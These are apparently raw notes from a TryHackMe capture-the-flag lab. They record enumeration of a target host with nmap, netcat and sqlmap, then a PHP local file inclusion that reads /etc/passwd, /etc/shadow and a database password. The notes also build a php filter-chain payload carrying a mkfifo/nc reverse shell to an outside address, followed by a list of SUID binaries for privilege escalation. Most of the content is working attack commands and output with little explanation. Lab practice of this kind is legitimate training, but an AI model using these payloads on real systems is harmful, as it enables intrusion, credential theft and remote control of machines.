10.10.98.165

Firewall is blocking our probing.


nc 10.10.98.165 21                       
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00


Not shown: 99 closed udp ports (port-unreach)                                                                        
PORT   STATE         SERVICE                                                                                         
68/udp open|filtered dhcpc    

Nmap scan report for 10.10.98.165
Host is up (0.081s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
| banner: 550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf
|_00
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=7/21%Time=687DB104%P=x86_64-pc-linux-gnu%r(NULL
SF:,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f7008800
SF:0cf00")%r(GenericLines,41,"550\x2012345\x200f7000f800770008777000000000
SF:000000f80008f7f70088000cf00")%r(Help,41,"550\x2012345\x200f7000f8007700
SF:08777000000000000000f80008f7f70088000cf00")%r(GetRequest,41,"550\x20123
SF:45\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(HTTPO
SF:ptions,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f7
SF:0088000cf00")%r(RTSPRequest,41,"550\x2012345\x200f7000f8007700087770000
SF:00000000000f80008f7f70088000cf00")%r(RPCCheck,41,"550\x2012345\x200f700
SF:0f800770008777000000000000000f80008f7f70088000cf00")%r(DNSVersionBindRe
SF:qTCP,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f700
SF:88000cf00")%r(DNSStatusRequestTCP,41,"550\x2012345\x200f7000f8007700087
SF:77000000000000000f80008f7f70088000cf00")%r(SSLSessionReq,41,"550\x20123
SF:45\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(Termi
SF:nalServerCookie,41,"550\x2012345\x200f7000f800770008777000000000000000f
SF:80008f7f70088000cf00")%r(TLSSessionReq,41,"550\x2012345\x200f7000f80077
SF:0008777000000000000000f80008f7f70088000cf00")%r(Kerberos,41,"550\x20123
SF:45\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(SMBPr
SF:ogNeg,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f70
SF:088000cf00")%r(X11Probe,41,"550\x2012345\x200f7000f80077000877700000000
SF:0000000f80008f7f70088000cf00")%r(FourOhFourRequest,41,"550\x2012345\x20
SF:0f7000f800770008777000000000000000f80008f7f70088000cf00")%r(LPDString,4
SF:1,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f70088000c
SF:f00")%r(LDAPSearchReq,41,"550\x2012345\x200f7000f8007700087770000000000
SF:00000f80008f7f70088000cf00")%r(LDAPBindReq,41,"550\x2012345\x200f7000f8
SF:00770008777000000000000000f80008f7f70088000cf00")%r(SIPOptions,41,"550\
SF:x2012345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r
SF:(LANDesk-RC,41,"550\x2012345\x200f7000f800770008777000000000000000f8000
SF:8f7f70088000cf00")%r(TerminalServer,41,"550\x2012345\x200f7000f80077000
SF:8777000000000000000f80008f7f70088000cf00");


kali:~/github/tryhackme/cheesectfv10/enum$ nc 10.10.98.165 22                       
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.13
^C
                                                                                                                             
kali:~/github/tryhackme/cheesectfv10/enum$ nc 10.10.98.165 80
l
HTTP/1.1 400 Bad Request
Date: Mon, 21 Jul 2025 03:24:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at ip-10-10-98-165.eu-west-1.compute.internal Port 80</address>
</body></html>
                                     


kali:~/github/tryhackme/cheesectfv10/enum$ nmap -sF -A 10.10.207.200 -oN nmap_sf.txt 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 02:27 CEST
Nmap scan report for 10.10.207.200
Host is up (0.050s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 db:f2:69:5f:c1:a0:e8:a0:c6:c4:d9:6e:14:2d:5b:6d (RSA)
|   256 45:b9:ac:1b:eb:e6:bf:6f:8a:48:96:83:fc:bf:94:56 (ECDSA)
|_  256 97:2c:50:f2:ca:fc:bc:ce:88:bf:8c:1e:4d:a7:e8:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: The Cheese Shop
|_http-server-header: Apache/2.4.41 (Ubuntu)
4444/tcp open  krb524?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     HTTP/1.200 OK
|_    oServer: Mac_OS_X-x86_64-HHPId, UPnP/8, PMS/g?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.95%I=7%D=7/22%Time=687EDADE%P=x86_64-pc-linux-gnu%r(NU
SF:LL,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/
SF:8,\x20PMS/g\?\r\n\n")%r(GetRequest,40,"HTTP/1\.200\x20OK\r\noServer:\x2
SF:0Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(SSLSessionReq,4
SF:0,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x
SF:20PMS/g\?\r\n\n")%r(TLSSessionReq,40,"HTTP/1\.200\x20OK\r\noServer:\x20
SF:Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(SSLv23SessionReq
SF:,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,
SF:\x20PMS/g\?\r\n\n")%r(GenericLines,40,"HTTP/1\.200\x20OK\r\noServer:\x2
SF:0Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(HTTPOptions,40,
SF:"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20
SF:PMS/g\?\r\n\n")%r(RTSPRequest,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_
SF:OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(RPCCheck,40,"HTTP/1\
SF:.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\
SF:r\n\n")%r(DNSVersionBindReqTCP,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac
SF:_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(DNSStatusRequestTCP
SF:,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,
SF:\x20PMS/g\?\r\n\n")%r(Help,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_
SF:X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(TerminalServerCookie,40
SF:,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x2
SF:0PMS/g\?\r\n\n")%r(Kerberos,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS
SF:_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(SMBProgNeg,40,"HTTP/1\
SF:.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\
SF:r\n\n")%r(X11Probe,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64
SF:-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(FourOhFourRequest,40,"HTTP/1\.2
SF:00\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\
SF:n\n")%r(LPDString,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-
SF:HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")%r(LDAPSearchReq,40,"HTTP/1\.200\x2
SF:0OK\r\noServer:\x20Mac_OS_X-x86_64-HHPId,\x20UPnP/8,\x20PMS/g\?\r\n\n")
SF:%r(LDAPBindReq,40,"HTTP/1\.200\x20OK\r\noServer:\x20Mac_OS_X-x86_64-HHP
SF:Id,\x20UPnP/8,\x20PMS/g\?\r\n\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=7/22%OT=22%CT=1%CU=35350%PV=Y%DS=2%DC=T%G=Y%TM=687EDB1
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=Z%TS=A)SEQ(SP=104%GC
OS:D=1%ISR=108%TI=Z%CI=Z%TS=A)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)SEQ(S
OS:P=106%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)SEQ(SP=FF%GCD=1%ISR=107%TI=Z%TS=A)OPS
OS:(O1=M509ST11NW7%O2=M509ST11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST1
OS:1NW7%O6=M509ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=F4B3%S=O%A=S+%F=AS%O=M509ST11NW7%RD=0%Q=)T6
OS:(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)T7(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G
OS:%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   49.52 ms 10.14.0.1
2   49.99 ms 10.10.207.200

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.22 seconds                   





Web Stack Fingerprinted
OS: Linux (Ubuntu 20.04 / 20.10 / 19.10)

Web Server: Apache 2.4.41

Backend: MySQL (MariaDB fork) ≥ 5.0.12





[02:39:23] [INFO] retrieved: users
available databases [2]:
[*] information_schema
[*] users



Database: users
Table: users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+



[02:48:45] [INFO] retrieved: 5b0c2e1b4fe1410e47f26feff7f4fc4c
[02:50:49] [INFO] retrieved: comte




root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
comte:x:1000:1000:comte:/home/comte:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash



comte
ubuntu


http://10.10.207.200/secret-script.php?file=php://filter/resource=/etc/passwd

http://10.10.207.200/secret-script.php?file=php://filter/resource=/home/comte/user.txt

http://10.10.207.200/secret-script.php?file=php://filter/read=convert.base64-encode/resource=/etc/shadow




<?php
  //echo "Hello World";
  if(isset($_GET['file'])) {
    $file = $_GET['file'];
    include($file);
  }
      


curl 'http://10.10.207.200/secret-script.php?file=php://filter/convert.base64-encode/resource=login.php' | base64 -d



 // Replace these with your database credentials
$servername = "localhost";
$user = "comte";
$password = "VeryCheesyPassword";
$dbname = "users";


python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.11.72.22 443 >/tmp/f"); ?>' | grep '^php' > payload.txt


nc -lpvn 4444


$ curl -s "http://10.10.184.98/secret-script.php?file=$(cat payload.txt)"


$ uname -a
Linux ip-10-10-207-200 5.15.0-138-generic #148~20.04.1-Ubuntu SMP Fri Mar 28 14:32:35 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
$ 



/snap/snapd/21184/usr/lib/snapd/snap-confine
/snap/snapd/20092/usr/lib/snapd/snap-confine
/snap/core20/2501/usr/bin/chfn
/snap/core20/2501/usr/bin/chsh
/snap/core20/2501/usr/bin/gpasswd
/snap/core20/2501/usr/bin/mount
/snap/core20/2501/usr/bin/newgrp
/snap/core20/2501/usr/bin/passwd
/snap/core20/2501/usr/bin/su
/snap/core20/2501/usr/bin/sudo
/snap/core20/2501/usr/bin/umount
/snap/core20/2501/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2501/usr/lib/openssh/ssh-keysign
/snap/core20/2182/usr/bin/chfn
/snap/core20/2182/usr/bin/chsh
/snap/core20/2182/usr/bin/gpasswd
/snap/core20/2182/usr/bin/mount
/snap/core20/2182/usr/bin/newgrp
/snap/core20/2182/usr/bin/passwd
/snap/core20/2182/usr/bin/su
/snap/core20/2182/usr/bin/sudo
/snap/core20/2182/usr/bin/umount
/snap/core20/2182/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2182/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1







